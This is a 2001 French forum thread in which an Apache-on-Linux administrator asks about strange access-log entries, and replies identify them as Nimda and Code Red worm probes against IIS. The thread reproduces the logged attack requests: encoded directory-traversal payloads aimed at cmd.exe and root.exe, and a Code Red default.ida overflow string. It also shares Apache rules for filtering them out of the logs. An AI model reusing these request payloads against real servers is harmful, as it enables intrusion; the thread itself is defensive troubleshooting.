Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1098 connectés 

  FORUM HardWare.fr
  Linux et OS Alternatifs

  Logs Apache bizarres ....

 
 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Logs Apache bizarres ....

n°29652
pingu23
Posté le 18-09-2001 à 23:04:07  profilanswer
 

j'ai mon serveur web apache (1.3.19) sous linux (mandrake 8.0).
de temps en temps je regarde le fichier log d'apache et ces temps ci, je constate la présence de ces lignes :
 
213.44.128.16 - - [18/Sep/2001:22:42:25 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
213.44.128.16 - - [18/Sep/2001:22:42:25 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
213.44.128.16 - - [18/Sep/2001:22:42:25 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
213.44.128.16 - - [18/Sep/2001:22:42:25 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
213.44.128.16 - - [18/Sep/2001:22:42:26 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
213.44.128.16 - - [18/Sep/2001:22:42:26 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
213.44.128.16 - - [18/Sep/2001:22:42:26 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
213.44.128.16 - - [18/Sep/2001:22:42:26 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
213.44.128.16 - - [18/Sep/2001:22:42:26 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.44.128.16 - - [18/Sep/2001:22:42:26 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.44.128.16 - - [18/Sep/2001:22:42:27 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.44.128.16 - - [18/Sep/2001:22:42:27 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.44.128.16 - - [18/Sep/2001:22:42:27 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
213.44.128.16 - - [18/Sep/2001:22:42:27 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
213.44.128.16 - - [18/Sep/2001:22:42:27 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
213.44.128.16 - - [18/Sep/2001:22:42:28 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
213.44.44.171 - - [18/Sep/2001:22:46:07 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
213.44.44.171 - - [18/Sep/2001:22:46:15 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
213.44.44.171 - - [18/Sep/2001:22:46:24 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
213.44.44.171 - - [18/Sep/2001:22:46:31 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
213.44.44.171 - - [18/Sep/2001:22:46:38 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
213.44.44.171 - - [18/Sep/2001:22:46:44 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
213.44.44.171 - - [18/Sep/2001:22:46:50 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
213.44.18.243 - - [18/Sep/2001:22:54:57 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
213.44.18.243 - - [18/Sep/2001:22:55:07 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
 
quelqu'un peut me dire ce que sont ces fichiers  ?? (winnt/system32/cmd.exe ...) ???
 
cela commence à m'inquiéter ...
 
merci d'avance

mood
Publicité
Posté le 18-09-2001 à 23:04:07  profilanswer
 

n°29672
Dark_Schne​ider
Close the World, Open the Net
Posté le 19-09-2001 à 02:51:44  profilanswer
 

c'est un virus/vers windows qui essaie d'attaquer ta machine. Mais bon pour trouver des .exe et un rep winnt, il peut toujours se brosser.
 
news sur linuxfr
 
http://computerworld.com/nlt/1%2C3 [...] %2C00.html

 

[edtdd]--Message édité par Dark_Schneider--[/edtdd]


---------------
Mandriva : parce que nous le valons bien ! http://linux-wizard.net/index.php
n°29874
pingu23
Posté le 19-09-2001 à 23:03:59  profilanswer
 

ok ...
mais que dois-je faire maintenant ? puis-je peux laisser faire sans risques pour mon serveur ?

n°29876
_Evangelio​n_
Posté le 19-09-2001 à 23:16:08  profilanswer
 

rien, tu es sous apache, or cette "daube" n'est efficace que contre IIS.
 
A part remplir tes logs, c'est tout ce que ca va te faire.


---------------
Un clavier azerty en vaut deux.
n°29981
Sly Angel
Architecte / Développeur principal
Posté le 20-09-2001 à 17:56:46  profilanswer
 

Pour plus d'infos : http://www.securityspace.org/smyse [...] a_amm.html
 
Bien sur executer cmd.exe sur un linux il aura du mal ;)

n°29982
minusplus
Posté le 20-09-2001 à 17:58:22  profilanswer
 

faudrait lui faire lancer wine avant...
c'est un virus de merde !
 
 
:D

n°29983
Sly Angel
Architecte / Développeur principal
Posté le 20-09-2001 à 18:02:34  profilanswer
 

Faudrait surtout que les abrutis de concepteurs de cette merde regarde ce que c'est le server avant de lancer les lignes à la bourrain et rempli mon DD :o
 
Je vais finir par foutre un CRON pour faire un grep -v "c+dir" pour voir ce qu'il y a d'autre dans mon access apache :o
 
tiens aussi un code red :

Code :
  1. 217.11.165.110 - - [13/Sep/2001:22:46:44 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  2. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  3. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  4. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  5. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%
  6. ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
  7. bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
  8. b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 281


 
aussi plein de lignes, si c'est pas malheureux de remplir un log apache sous linux avec des attaques IIS :lol:

n°29985
minusplus
Posté le 20-09-2001 à 18:16:49  profilanswer
 

ben pas si leur but est aussi de saturer les réseaux et les machines infectées...

n°29991
nicotine
Posté le 20-09-2001 à 18:48:11  profilanswer
 

httpd.conf chez moi :  
 
ErrorLog /web/apache/logs/error_log  
SetEnvIf Request_URI "\.exe$" nolog  
SetEnvIf Request_URI "\.ida$" nolog  
CustomLog /web/apache/logs/error_log common env=!nolog  
 
SetEnvIf Request_URI "\.ida$" nolog  
SetEnvIf Request_URI "\.exe$" nolog  
CustomLog /web/apache/logs/access_log common env=!nolog  
CustomLog /web/apache/logs/referer_log referer env=!nolog

 

[edtdd]--Message édité par nicotine--[/edtdd]


---------------
Do androïds dream of electric sheep ?
n°29992
nicotine
Posté le 20-09-2001 à 18:49:09  profilanswer
 

ca allege tes logs de ces saloperies ...


---------------
Do androïds dream of electric sheep ?
mood
Publicité
Posté le 20-09-2001 à 18:49:09  profilanswer
 

n°30070
allergy
bli ? aglapi !
Posté le 21-09-2001 à 09:03:59  profilanswer
 

Mais non, il faut les laisser dans les logs, et faire des trucs du genre : http://alrj.org/~allergy/nimda/
:)

n°30107
Sly Angel
Architecte / Développeur principal
Posté le 21-09-2001 à 11:46:06  profilanswer
 

oui mais la dans ce cas tu ajoutes ces lignes pour pas polluer le log principal :) :
 
Custom /var/log/httpd/attack.err error env=nolog
 
 
Custom /var/log/httpd/attack.access common env=nolog
Custom /var/log/httpd/attack.refer refer env=nolog


Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Linux et OS Alternatifs

  Logs Apache bizarres ....

 

Sujets relatifs
ApacheApache / PHP : autorisation en écriture .
LINUX apache PHP et MySQL :(Erreur 500 sur les .CGI dans apache :(
apache et ssi, inclusion d'un header[ APACHE + PHP ] Comment accelerer tout ca ?
[ Apache ] repertoire d'includeaccéder à 1 site sur apache à partir de NT
[UNIX, serveur web apache] configuration multi serveurs web--- > Encore moi ( debian + Apache )
Plus de sujets relatifs à : Logs Apache bizarres ....

Forum MesDiscussions.Net, Version 2010.2
(c) 2000-2011 Doctissimo
Page générée en 0.050 secondes

Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR